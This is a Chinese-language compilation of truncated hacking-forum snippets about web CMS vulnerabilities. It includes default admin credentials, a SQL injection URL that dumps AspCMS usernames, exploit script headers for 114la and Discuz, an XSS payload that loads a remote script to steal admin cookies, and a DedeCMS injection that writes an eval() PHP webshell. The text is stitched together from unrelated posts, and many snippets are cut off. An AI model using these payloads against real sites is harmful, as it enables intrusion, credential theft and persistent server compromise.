g.cn关键字：6CMS企业望站管理系统(中英繁三语版) 默认帐号密码：admin 后台：admin/ 也不知道程序员怎么弄得，我看到程序admin目录下有个防注入的sql.asp 但是上级目录却没有 默认数据库：data/#sze7xiaohu.mdb seeion验证感觉也有点乱来，记得有个admin目录下发布职位的文件可以直接访问（具体哪个文件），貌似可以直接发布消息 直接放啊D。 后台也直接数据库备份。 感觉没啥利用价值。没意思，自己当研究玩吧

aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且 支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。 漏洞文件：/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转，所以要快，建议用快捷键复制 爆用户名EXP: http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 这是爆ID...

<?php $sbcopyright=’ —————————————- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02   Usage: php ‘.$argv[0].’ host /path Example: php ‘.$argv[0].’ 127.0.0.1 / —————————————- ‘; if ($argc < 3) { print_r($sbcopyright); die(); }   ob_start(); $url = $argv[...

 aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。       漏洞出现在   /plug/productbuy.asp   对接收的参数id没有进行过滤而导致的注入漏洞   注入后的页面有跳转，所以要快，建议用快捷键复制   爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1   这是爆ID=1的账...

Author: Noevil Post To: T00ls.Net       利用方法，在线留言处：   名字填写：   Noevil<SCRIPT SRC=”HTTP://xxx/xss.js”></SCRIPT>   内容：随意。   后台管理员查看留言列表，自动截取Cookie，NoXss会努力的去Keep Session   登陆后台拿Shell：   添加模板，上传Zip，Zip里的东西会自动解压到 /templates/目录里。   剩下的你懂。

网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell www.t00ls.net5 G$ w& h” m! n9 S: G 前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’); 再用下面表单提交，shell 就在同目录下  1.php。原理自己研究。。。 ) O+ I’ L2 I% Y) E: ...

这是一套破系统，拿人家源马改改就说是自己的，还收费   垃圾系统，还对源马进行了加密。       漏洞一大堆   后台登录验证文件：   <!–#include file=”conn.asp”–> <!–#include file=”../class/Config.asp”–> <!–#include file=”inc/md5.asp”–> <!–#include file=”../class/Ubbsql.asp”–> <% dim sql,rs dim username,password,CheckCode username=replace(trim(request(“username”)),”‘”,”") password=replace(trim(Request(...

<!–p session_start();      include “../include/databaseConfig.inc.php”; $admin = $_POST['admin'];      $pass = md5($_POST['pass']); $codes = $_POST['codes'];      if($_GET['action']){ //这里开始错误！ /* if($result=$d–>Execute(“select * from x_admin where a_admin=’”.$admin.”‘”)){ if($rs=mysql_fetch_object($result)){ if($rs-&gt;a_pws==$pass){ if($codes!=$_SESSION['code']){ unset($_SESSION['code']); echo “<script type=”text/javascript”>...

<!–p<br–>print_r(‘ +—————————————————————————+ Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05 mail: toby57 at 163 dot com team: http://www.wolvez.org +————————————————&#...